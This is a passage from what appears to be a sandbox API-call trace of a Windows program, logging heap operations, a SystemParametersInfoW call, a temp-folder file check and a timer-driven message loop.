0x2e54b58 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0296.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0296.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0296.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0296.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0296.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0296.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0296.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0296.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0296.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0296.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0296.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0296.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0296.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0296.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0296.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0296.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0296.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0296.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0296.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0296.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0296.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0296.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0296.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0296.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0296.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0296.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0296.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0296.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0296.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0296.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0296.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0296.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0296.859] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0296.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0296.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0296.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0296.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69b48 [0296.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69b48, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0296.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0296.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0296.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0296.860] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0296.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0296.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0296.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0296.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0296.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0296.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0296.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0296.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0296.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0296.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0296.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0296.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0296.860] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0296.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0296.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0296.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0296.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0296.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0296.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0296.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0296.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0296.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0296.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0296.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0296.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0296.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0296.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0296.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0296.934] FreeLibrary (hLibModule=0x750c0000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0296.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0296.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0296.935] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0296.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0296.935] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0296.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0296.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0296.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0296.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0296.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0296.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0296.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0296.937] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0296.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0296.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0296.937] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0296.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0296.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0296.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0296.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0296.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0296.937] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0296.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0296.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0296.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0296.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0296.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0296.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0296.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0296.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0296.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0296.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0296.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0296.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0296.937] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0296.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0296.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0296.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0296.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0296.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0296.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0296.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0296.938] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0296.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0296.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0296.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0296.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0296.938] timeGetTime () returned 0x118a490 [0296.938] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0296.938] Sleep (dwMilliseconds=0xa) [0297.016] timeGetTime () returned 0x118a4dd [0297.016] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.016] Sleep (dwMilliseconds=0xa) [0297.097] timeGetTime () returned 0x118a52e [0297.097] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0297.097] TranslateMessage (lpMsg=0x8cf798) returned 0 [0297.097] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0297.097] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0297.097] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0297.098] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.098] Sleep (dwMilliseconds=0xa) [0297.206] timeGetTime () returned 0x118a59c [0297.206] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.206] Sleep (dwMilliseconds=0xa) [0297.328] timeGetTime () returned 0x118a616 [0297.329] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.329] Sleep (dwMilliseconds=0xa) [0297.450] timeGetTime () returned 0x118a68f [0297.450] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.450] Sleep (dwMilliseconds=0xa) [0297.500] timeGetTime () returned 0x118a6c1 [0297.500] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.500] Sleep (dwMilliseconds=0xa) [0297.578] timeGetTime () returned 0x118a70f [0297.578] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.578] Sleep (dwMilliseconds=0xa) [0297.628] timeGetTime () returned 0x118a742 [0297.628] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.628] Sleep (dwMilliseconds=0xa) [0297.667] timeGetTime () returned 0x118a769 [0297.668] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0297.668] Sleep (dwMilliseconds=0xa) [0297.702] timeGetTime () returned 